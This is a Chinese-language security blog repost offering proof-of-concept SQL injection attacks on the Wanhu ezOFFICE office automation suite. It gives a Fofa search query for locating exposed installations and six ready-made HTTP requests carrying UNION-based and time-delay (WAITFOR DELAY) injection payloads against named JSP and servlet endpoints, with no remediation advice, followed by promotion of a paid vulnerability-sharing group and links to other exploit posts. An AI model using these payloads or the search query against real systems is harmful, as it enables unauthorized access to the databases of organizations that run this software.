2024年1月31日14:46:23评论120 views字数 2089阅读6分57秒阅读模式

0x01 漏洞简述

—

万户ezOFFICE是一款全面的企业办公自动化软件，集成了办公协作、文档管理、流程审批等多个功能模块。它提供便捷的办公环境，帮助企业提高工作效率、降低成本，并提供灵活的定制化能力，满足不同企业的需求。万户ezOFFICE具有友好的用户界面和强大的安全性，支持跨平台使用，适用于各行各业的企业，是实现数字化办公的理想选择。

(内附POC)万户 ezOFFICE多个接口存在SQL注入

0x02 资产测绘

—

Fofa语法："Ezoffice"

0x03 漏洞复现

—

SendFileCheckTemplateEdit.jsp SQL注入

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

(内附POC)万户 ezOFFICE多个接口存在SQL注入

wpsservlet SQL注入

GET /defaultroot/wpsservlet?option=getSign&userId=1;WAITFOR%20DELAY%20%270:0:5%27--&orgIdString=1&domainId=1 HTTP/1.1Host: User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

(内附POC)万户 ezOFFICE多个接口存在SQL注入

wf_accessory_delete.jsp SQL注入

GET /defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=1%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: close

(内附POC)万户 ezOFFICE多个接口存在SQL注入

DocumentEdit_deal.jsp SQL注入

GET /defaultroot/public/iWebOfficeSign/DocumentEdit_deal.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: close

(内附POC)万户 ezOFFICE多个接口存在SQL注入

DocumentEdit_unite.jsp SQL注入

POST /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip

(内附POC)万户 ezOFFICE多个接口存在SQL注入

pic.jsp SQL注入

GET /defaultroot/platform/portal/portlet/pic/pic.jsp?num=1&channelId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip

(内附POC)万户 ezOFFICE多个接口存在SQL注入

0x04 圈子介绍

—

第一时间获取新的漏洞讯息，圈内每天更新1-3篇漏洞资源

（目前帮会已更新漏洞40+，有兴趣的小伙伴可以加入帮会）

(内附POC)万户 ezOFFICE多个接口存在SQL注入

原文始发于微信公众号（代码审计战士CodeWarrior）：(内附POC)万户 ezOFFICE多个接口存在SQL注入

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

(内附POC)万户 ezOFFICE多个接口存在SQL注入

SendFileCheckTemplateEdit.jsp SQL注入

wpsservlet SQL注入

wf_accessory_delete.jsp SQL注入

DocumentEdit_deal.jsp SQL注入

DocumentEdit_unite.jsp SQL注入

pic.jsp SQL注入

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

发表评论

在线咨询

微信